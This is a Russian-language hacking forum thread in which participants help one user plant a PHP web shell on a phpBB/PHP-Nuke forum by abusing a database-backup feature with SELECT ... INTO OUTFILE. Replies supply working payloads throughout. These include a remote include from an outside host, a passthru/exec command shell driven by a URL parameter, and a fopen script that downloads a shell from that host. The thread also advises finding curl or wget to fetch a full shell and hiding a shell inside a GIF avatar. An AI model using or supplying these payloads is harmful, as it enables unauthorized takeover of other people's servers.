Заливаю шелл через востановление базы в phpbb
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Код исполняется это факт, но когда захожу на
http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает.
Из-за чего такое может быть?

в папке куда ты залил шел находится конфигурационный файл Апача...
с параметрами: "первый нах"(шутка, но только про имя параметра...)

прав не хватает, что бы через бд файл заливать

прав не хватает, что бы через бд файл заливать
не факт, обычно если не хватает прав, то вобще ничего не создается, и выбрасывает уведомления, а тут с этим все в порядке.

если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
если при заходе на сцылко shell.php покажет те пшпинфо, то можешь заливать такой код
<? passthru($_GET[cmd]); ?>

потом юзай shell.php?cmd=ls

зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc )

Возможно просто отключена возможность подключения удаленных файлов через include().
Создай файл с кодом

<?
phpinfo();
?>

и посмотри на директуву allow_url_fopen, если она off, тогда через include() ничего не вийдет.

попробуй

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php';

Такс phpinfo - катит
allow_url_fopen - on.
Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =(
Хотя все ясно
allow_url_include - Off
Чем можно заменить include? кажется можно curl, но как?

Кстати <? passthru($_GET[cmd]); ?>
не катит, при запросе любой команды тоже белая страница когда просто запустил shell.php то квакнуло Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\путь_к_шелу

Может быть safe_mode = on, тогда не команды не выполняются.

попробуй багу с подменой аватарного пути

_http://forum.antichat.ru/showpost.php?p=281765&postcount=2

хз, пробуй <? exec($_GET[cmd]); ?>

safe mode - off
Spyder
Не катит =(
maxster
А смысл? там-же тоже через инклуд(или ты о 7 способе?)

а если сделать так?
SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Да и с путями разберись

SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
выбрасывает вот такую фигню

Warning: filesize() [function.filesize]: stat failed for http://host.narod.ru/files.txt in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

Warning: fread() [function.fread]: Length parameter must be greater than 0 in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

GrAmOzEkA
Пару раз уже говорил - не прокатит инклуд.

Почему бы просто не сделать так:
<? passthru("команда"); ?>
если по-другому не получается ;)

andy13 - читай пост c411k на 1 странице

мдя. выставляешь в админке phpbb максимальный размер загруж авы 150кб, грузишь аву http://c411k.jino-net.ru/upload/achat.gif http://c411k.jino-net.ru/upload/achat.gif
бэкапишь бд с запросом SELECT '<?php include("/avatars/achat.gif"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
и у тебя есть полноценный шелл от рст. если не можешь изменить размер, то рисуешь в фотошопе пиксель 1х1, сохраняешь, открываешь в HEX-редакторе и встявляешь в конец маленький по размеру шелл.

Micr0b, я писал про вставку команд напрямую
passthru("uname -a; id ..."), а не про передачу их через запросы.

А если там стоит ASP.Net без ПХП, то что тогда использовать?
Есть только возможность править страницу.